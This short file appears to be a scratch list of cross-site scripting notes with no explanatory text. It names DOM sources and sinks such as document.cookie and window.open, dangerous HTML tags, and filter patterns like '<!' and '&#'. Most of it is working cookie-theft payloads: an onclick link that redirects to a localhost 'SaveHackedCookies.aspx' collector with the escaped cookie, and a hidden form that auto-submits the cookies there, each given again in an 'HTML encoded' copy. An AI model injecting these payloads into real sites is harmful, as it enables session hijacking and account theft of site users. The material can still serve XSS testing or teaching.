document.getElementById('myAnchor').innerHTML
location.search
document.cookie
document.location
window.location.href
window.open
<a>
<div>
<form>
<iframe>
<object>
<img>
<script>
<embed>
<a href="#" onclick="document.location='http://localhost/XSSHackCookies/SaveHackedCookies.aspx?cookiesvalues=' +escape(document.cookie);" target=_blank>Click me</a>
<script>window.open("http://www.cnn.com")</script>
HTML encoded: <a href="#" onclick="document.location='http://localhost/XSSHackCookies/SaveHackedCookies.aspx?cookiesvalues=' +escape(document.cookie);" target=_blank>Click me</a>
<form name='hackerform' method='POST' action='http://localhost/XSSHackCookies/savehackedcookies.aspx'><script> document.write('<input type=hidden name=cookiesvalues value='); document.write(document.cookie); document.write('>');</script></form><script>document.forms[0].submit()</script>
HTML encoded:<form name='hackerform' method='POST' action='http://localhost/XSSHackCookies/savehackedcookies.aspx'><script> document.write('<input type=hidden name=cookiesvalues value='); document.write(document.cookie); document.write('>');</script></form><script>document.forms[0].submit()</script>
<a-z,
<!, </, <?,
&#